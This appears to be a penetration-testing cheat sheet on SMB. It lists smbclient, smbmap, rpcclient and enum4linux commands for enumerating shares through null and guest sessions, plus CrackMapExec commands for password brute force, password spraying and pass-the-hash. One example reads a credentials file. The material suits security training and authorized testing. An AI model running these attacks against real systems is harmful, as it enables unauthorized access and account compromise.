Shelled

SMB

Criteria

List Shares (Unauthenticated)

Description

There are many different tools used to list SMB shares.

smbmap

smbmap -H 10.129.14.128

smbclient

smbclient -N -L //10.129.14.128

List Shares (Authenticated)

Description

There are many different tools used to list SMB shares.

smbmap

smbmap -H 10.129.14.128 -u shelled

smbclient

smbclient -L //10.129.14.128 -U shelled

Is SMB guest user same as null session?

Connect to Share

Description

There are many different tools used to connect to an SMB share.

smbclient

smbclient //10.129.14.128 -U shelled

SMB Commands

Description

Here are a few commands to use when connected to a share using smbclient.

List files on share

ls

Go into a Folder

cd <folder>

Create a folder

mkdir <folder>

Download a file

get <file>

Upload a file

put <local_filename> <remote_filename>

Rename a file

rename <remote_filename> <new_remote_filename>

Local Commands

SMB allows you to execute local system commands

!<cmd>

Example

!cat creds.txt

Attacks

Null Authentication

Description

SMB can be configured not to require authentication, which is often called a `null session`. We can login to SMB without a username or password by doing the following:

smbclient

smbclient -N -L //{IP}

smbmap

smbmap -H {IP}

rpcclient

rpcclient -U "" -N {IP}

enum4linux

enum4linux -a {IP}

Guest Account

Description

The SMB guest account is designed to provide public access to certain resources without requiring users to log in with individual credentials. This can be useful for scenarios where read-only access is required for specific folders or files, such as providing public access to shared documents or media files.

smbclient

smbclient -L //{IP} -U guest

smbmap

smbmap -H {IP} -u guest -p ''

rpcclient

rpcclient -U "guest" -N {IP}

enum4linux

enum4linux -a {IP} -u 'guest' -p ''

Is SMB guest user same as null session?

Password Bruteforce

Description

We can bruteforce passwords using CrackMapExec (CME).

crackmapexec smb {IP} -u 'marie@shelled.io' -p /tmp/passwords.txt

crackmapexec smb {IP} -u 'marie@shelled.io' -p /tmp/passwords.txt --local-auth

Password Spray

Description

We can password spray using CrackMapExec (CME).

crackmapexec smb {IP} -u /tmp/userlist.txt -p 'Company01!'

crackmapexec smb {IP} -u /tmp/userlist.txt -p 'Company01!' --local-auth

Pass the Hash

Description

If we manage to get an NTLM hash of a user, and if we cannot crack it, we can still use the hash to authenticate over SMB with a technique called Pass-the-Hash (PtH). When users log in to a Windows-based system, their passwords are not stored in plaintext. Instead, the system stores a one-way mathematical representation of the password called a hash. The hash is generated from the user's password using a hashing algorithm. This hash is what is used to validate the user's credentials when they attempt to log in.

In a Pass-the-Hash attack, an attacker captures the hashed password of a valid user from a compromised system or network. Instead of attempting to crack the hash and retrieve the plaintext password, the attacker simply reuses the captured hash directly to authenticate themselves on other systems without needing to know the original password.

crackmapexec smb {IP} -u Administrator -H {HASH}